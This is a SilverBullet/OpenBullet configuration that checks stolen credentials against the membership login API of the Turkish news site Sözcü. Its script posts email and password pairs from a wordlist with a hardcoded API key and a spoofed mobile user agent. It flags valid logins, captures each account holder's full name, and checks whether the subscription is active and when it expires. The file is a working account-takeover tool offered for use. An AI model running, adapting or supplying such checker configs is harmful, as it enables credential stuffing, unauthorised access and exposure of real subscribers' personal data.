[SETTINGS]
{
  "Name": "APİ - Sözcü",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-06-09T12:05:54.3061553+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "! Muhammed | CT",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "APİ - Sözcü",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LoginGonder REQUEST POST "https://uyelik.sozcu.com.tr/api/userMethods.php" 
  CONTENT "{\"key\":\"52A51D6C0D3F2\",\"method\":\"authenticateWebUser\",\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "text/plain;charset=UTF-8" 
  HEADER "Content-Type: text/plain;charset=UTF-8" 
  HEADER "Host: uyelik.sozcu.com.tr" 
  HEADER "Connection: Keep-Alive" 
  HEADER "User-Agent: okhttp/3.12.1" 
  HEADER "Accept-Encoding: gzip, deflate" 

#AnahtarKontrol KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
  KEYCHAIN Success OR 
    KEY "success\":true" 

#CaptureCek PARSE "<SOURCE>" JSON "lastname" -> VAR "Soyad" 

#CaptureCek PARSE "<SOURCE>" JSON "firstname" CreateEmpty=FALSE -> CAP "İsim" "" " <Soyad>" 

#TokenCek PARSE "<SOURCE>" JSON "userGuid" -> VAR "User GUID" 

#CaptureUrl REQUEST POST "https://uyelik.sozcu.com.tr/api/membershipMethods.php" 
  CONTENT "{\"key\":\"52A51D6C0D3F2\",\"method\":\"isMembershipValid\",\"userGuid\":\"<User GUID>\"}" 
  CONTENTTYPE "text/plain;charset=UTF-8" 
  HEADER "Content-Type: text/plain;charset=UTF-8" 
  HEADER "Host: uyelik.sozcu.com.tr" 
  HEADER "Connection: Keep-Alive" 
  HEADER "User-Agent: okhttp/3.12.1" 
  HEADER "Accept-Encoding: gzip, deflate" 

#FreeKontrol KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "status\":false" 

#CaptureCek PARSE "<SOURCE>" JSON "lastMembershipTimestamp" CreateEmpty=FALSE -> CAP "Bitiş Tarihi" 

#CaptureFix FUNCTION UnixTimeToDate "dd.MM.yyyy" "<Bitiş Tarihi>" -> CAP "Bitiş Tarihi" 

SET CAP "Author" "! Muhammed"

